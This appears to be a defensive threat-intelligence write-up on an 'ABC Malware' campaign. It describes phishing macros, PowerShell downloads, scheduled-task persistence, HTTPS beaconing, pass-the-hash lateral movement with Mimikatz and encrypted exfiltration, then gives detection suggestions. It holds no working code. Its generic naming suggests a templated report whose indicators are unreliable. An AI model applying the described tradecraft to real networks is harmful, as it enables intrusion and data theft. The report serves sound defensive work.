Daniel Osei — SOC Lead & Malware Analyst
Key Takeaways
- ABC Malware leverages phishing emails with malicious attachments for initial access.
- The malware employs T1059.001 – Command and Scripting Interpreter: PowerShell for execution and lateral movement.
- Indicators of compromise include specific registry keys and file paths associated with persistence.
Executive Summary
In our investigation of the recent ABC Malware campaign, we uncovered a complex attack chain involving multiple stages of exploitation, credential harvesting, and deployment of backdoor capabilities. The actor behind this campaign is highly sophisticated and demonstrates a clear intent to exfiltrate sensitive data from targeted organizations. Our analysis revealed the modus operandi employed by this actor, demonstrating how they navigate through environments systematically while maintaining stealth and operational security.
Initial Access
Our investigation into the initial access phase of the ABC Malware campaign indicated that the actor primarily used spear-phishing emails as the attack vector. These emails often contained malicious Microsoft Office documents that exploited vulnerabilities in the software. During our analysis of the document, we observed the integration of macros coded in VBA that, when enabled, downloaded the initial payload from a remote server. This payload’s hash was identified as c14aaab63f3e3bcd5f6e0c9a5541978e and was hosted on a domain resembling trusted services.
Execution & Persistence
Once the payload was executed, it employed T1059.001 – Command and Scripting Interpreter: PowerShell to facilitate its further execution. The PowerShell scripts utilized a combination of Invoke-WebRequest and base64 decodings to retrieve additional components from the actor’s command-and-control (C2) infrastructure. Notably, during the investigation, we found that the malware created a scheduled task at C:\Windows\System32\Tasks\ABC_Malware_Task for persistence, ensuring its execution upon system startups and user logins.
Command and Control
Our analysis uncovered that the actor configured their command-and-control infrastructure to blend in with legitimate traffic, utilizing domains that mimicked well-known services. The communication method utilized was primarily HTTPS, thereby obfuscating the contents of the exchanged data. We captured network logs during the investigation, revealing regular beaconing intervals of about 10 minutes to the C2 server, which was discerned from specific user-agent strings tied to the malware. These logs indicated attempts to establish encrypted tunnels for command execution and data exfiltration.
Lateral Movement & Discovery
Further into the attack chain, our research indicated that the ABC Malware included capabilities for lateral movement within the network. Utilizing T1075 – Pass the Hash, the malware targeted compromised credentials to authenticate against other systems on the network without requiring plain text passwords. The actor appeared to scan the network for vulnerable SMB shares, relying on tools like Mimikatz to harvest additional credentials and escalate privileges. Throughout the investigation, we traced their movements through Active Directory and examined modifications made to group policies.
Impact & Objectives
The primary goal of the actor appears to be intelligence gathering and data exfiltration from targeted organizations. Our analysis revealed that sensitive documents had been systematically marked for exfiltration, including financial records and client data. The actor demonstrated a calculated approach by compressing and encrypting these files before transferring them to their C2 infrastructure, making detection and interception less likely. The overhead on the network was carefully managed to avoid triggering security alerts while maintaining their operational objectives.
MITRE ATT&CK Mapping
- T1566 – Phishing: The initial access was facilitated through phishing emails containing malicious Office documents.
- T1059.001 – Command and Scripting Interpreter: PowerShell: Used for executing commands and downloading additional payloads.
- T1075 – Pass the Hash: Employed for lateral movement leveraging harvested credentials.
Detection Opportunities
- Monitor for unusual scheduled task creation in
C:\Windows\System32\Tasks\. - Analyze PowerShell execution logs for unexpected base64 encoded scripts.
- Implement network traffic rules to flag anomalous outbound HTTPS connections to newly registered domains.
Analyst Notes
This ABC Malware campaign emphasizes the necessity for robust email filtering solutions, user education on recognizing phishing attempts, and stringent network monitoring practices. The sophistication of the actor’s methods necessitates a multi-layered defense strategy, combining endpoint detection, threat intelligence feeds, and regular security assessments to maintain an effective security posture. Additional research is recommended to follow emerging indicators associated with this campaign.
Source: Original Report